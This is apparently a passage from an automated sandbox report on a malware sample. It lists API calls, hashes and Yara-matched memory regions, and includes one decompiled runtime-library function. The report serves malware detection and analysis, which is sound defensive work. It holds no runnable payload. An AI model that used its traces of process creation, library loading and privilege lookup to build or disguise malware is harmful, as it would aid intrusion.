                                  • Instruction ID: 1005f62b04cf3aaa6a9397fcf714a4b7299d8b4653b954a05ec20eb06e4143f9
                                  • Opcode Fuzzy Hash: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
                                  • Instruction Fuzzy Hash: C290026921300006F2A07159540860A000597D5346F91D43DA00065A8CC955D86D7361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
                                  • Instruction ID: e77b979688f1feee50f5fec36fbc7cf681c60d56ffe5356ca6e197eb9435d00b
                                  • Opcode Fuzzy Hash: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
                                  • Instruction Fuzzy Hash: 9190027120100417F23161594504707000997D4385F91C43AA04155A8D9696D956B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
                                  • Instruction ID: 4f33af5d050b049c29169f031480c2242ccbf13e9cd98cdf982ee65a00bda5ee
                                  • Opcode Fuzzy Hash: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
                                  • Instruction Fuzzy Hash: A2900261242041567665B15944045074006A7E4385791C03AA14059A0C8566E85AF661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
                                  • Instruction ID: f5d6b897c64e1a5fb6e9eaf61557e18b5e21e70d2545d8467cef383f00e65518
                                  • Opcode Fuzzy Hash: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
                                  • Instruction Fuzzy Hash: F29002B120100406F26071594404746000597D4345F51C039A50555A4E8699DDD976A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
                                  • Instruction ID: 5a8412f7eb02f746a936e595757ed8cf730d8cabeea359221aa7f96aa2213bbd
                                  • Opcode Fuzzy Hash: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
                                  • Instruction Fuzzy Hash: 939002A134100446F22061594414B060005D7E5345F51C03DE10555A4D8659DC567166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
                                  • Instruction ID: a66bb52d8059167851a82df7aa4dace64d3b0e92559b231d9871f75b2129f7b8
                                  • Opcode Fuzzy Hash: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
                                  • Instruction Fuzzy Hash: 6A90026121180046F32065694C14B07000597D4347F51C13DA01455A4CC955D8657561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 006173A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                  • Instruction ID: 6f1d928685c983d53232dcca327369ab50d333377a185b5e739047e5c6815d6f
                                  • Opcode Fuzzy Hash: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
                                  • Instruction Fuzzy Hash: 473190B6506700ABC715EF64C8A1FE7B7F9AF88700F04811DFA199B241D730B986CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 006173A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 7a8fe8aa750ece917929258db3b8876a4e8f126739e00d25dfa5636777b47152
                                  • Instruction ID: 3e3628eb4669de4a83171c662459439eea2e276e2c5037bfe003471fe35c0fe4
                                  • Opcode Fuzzy Hash: 7a8fe8aa750ece917929258db3b8876a4e8f126739e00d25dfa5636777b47152
                                  • Instruction Fuzzy Hash: 6F21A576505600ABC710DF64C8A1FEBBBB6BF88700F14811DFA199B241D770A595CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                                  • Instruction ID: 8bec6d8859b9312777ecd4eb2820a68a77a110d3f748d154437a457bd81c8a89
                                  • Opcode Fuzzy Hash: d62e800b08c4cc61464d52e6078d3c6050bf1d99bc0f7649bca3bd97df8f6a16
                                  • Instruction Fuzzy Hash: A601DE762042047FD721DF98DC96EE77759EF843A0F084495F94C9B242C930EA50CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                                  • Instruction ID: ffb0514748c954c2579699ab158e20a2787b829977048ad0d164d28902173702
                                  • Opcode Fuzzy Hash: 8aaa531ffc0db079491aec3f70eed164a8d3963a6421d82781efd33be8240a16
                                  • Instruction Fuzzy Hash: FDF0BEB62042146BCB15DF98DC49EE7779DEF88750F154999F9086B242C630E950CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00603B93), ref: 0061891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 363694fccc7a49ba6e1a44032f629936e6d1c64c8c6774095d49399ff7ec7659
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: AAE012B1200208ABDB18EF99CC49EA777ADAF88750F018558FA085B242C630E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(65a,?,00613CAF,00613CAF,?,00613536,?,?,?,?,?,00000000,00000000,?), ref: 006188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65a
                                  • API String ID: 1279760036-1193530184
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: b628e34f2afa34b136727073969866547ea64c6a23e99b6a1df447d4dd6994f9
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: A4E012B1200208ABDB14EF99CC45EA777ADAF88750F158558FA085B242C630F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006072DA
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006072FB
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                  • Instruction ID: 90264de6e0b06469e3010609f39e11cd9c9adafd39ea5f8d6ed230ade87442ff
                                  • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                  • Instruction Fuzzy Hash: D0018F31A8022977E725AA949C03FFF766D5B40B51F150119FF04BA2C2EA946A0686FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00609BB2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: 84e07f0e3801c5c9c9fb5901d6ce0a3d997baa0993e3ec40bd9de6d6e3765952
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: 68015EB5E4020DBBDF14DAE0EC42FDEB37A9B54318F044199A90897281F670EB54CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006189B4
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                                  • Instruction ID: f0bcea23958045f52005b5e9381939415daf5b22adae4ed6ec474bbb41bba19b
                                  • Opcode Fuzzy Hash: c1ebe75da85cb51ebaa87378d775be1eb7b29cfb1eb12bd5ebb548284419c4f7
                                  • Instruction Fuzzy Hash: FFF019B6200209AFCB14DF99DC80DEB73ADEF88350F008558FA0C97241C630E850CBB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006189B4
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 7d0620e1d494bf9ec0f345a8727884c6c54330c9b510c9cac3e0aa547a90e687
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 0B01B2B2214108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0060CCF0,?,?), ref: 0061746C
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                  • Instruction ID: d58f88ede2561600bde1cb2ab29d9f4c2efc52bb9bc5be78a8094b4727df3fe5
                                  • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                  • Instruction Fuzzy Hash: F7E092333803143AE33065A99C03FE7B79DCB81B60F58002AFA4DEB2C1D595F84142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0060CFC2,0060CFC2,?,00000000,?,?), ref: 00618A80
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                                  • Instruction ID: 1c89c3691aca3212592ca8f5fc9542cc1edf02ded3e30ca54160cb16fc3dea84
                                  • Opcode Fuzzy Hash: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                                  • Instruction Fuzzy Hash: D3E0E5751142906FCB11CB69DC45E973FA8DF45240F084599FD8857203C4309414C7B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0060CFC2,0060CFC2,?,00000000,?,?), ref: 00618A80
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: a1d0792977a7f21b19d89bffc35278106145376d79ba4375bf4c000105662759
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: DAE01AB12002086BDB10DF49CC85EE737ADAF88750F018154FA0857241C930E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00607C83,?), ref: 0060D45B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                                  • Instruction ID: 16d7d4891df043ed082329bef6ff29bad0c3d7b577815da352424241739a80a0
                                  • Opcode Fuzzy Hash: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                                  • Instruction Fuzzy Hash: 80D02E21B803003AEB10FAE88C03F6A32896B00B60F4A0264FA199E3C3D920E94182A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,00607C83,?), ref: 0060D45B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction ID: 46072bb733154f1a5f26a536cf98d5c6e64627862e6b871e15c76e1cf8dc3b80
                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction Fuzzy Hash: 9BD05E657903042AE610AAA49C03F6632C95B45B40F494064FA49963C3D960E5008165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
                                  • Instruction ID: f65e0e02420f05a32197d006dd4c8ec2b71d0776deaaee5169fc8ffff24f9806
                                  • Opcode Fuzzy Hash: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
                                  • Instruction Fuzzy Hash: 9BB09BF19014C5C9F721D760460C717790077D4745F26C076D3520691A4778D095F5F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 53%
                                  			E0480FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E047BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E04805720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E04805720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}











                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0480FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0480FE2B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
                                  • Instruction ID: af2c8a7edee742cbb19128777e0ed0d10c0408d4341bd7134745e4c557d07e29
                                  • Opcode Fuzzy Hash: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
                                  • Instruction Fuzzy Hash: E0F0FC72600101BFE6601A55DC06F237B5AEB44730F148714F718951D1EAA2F8209AF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%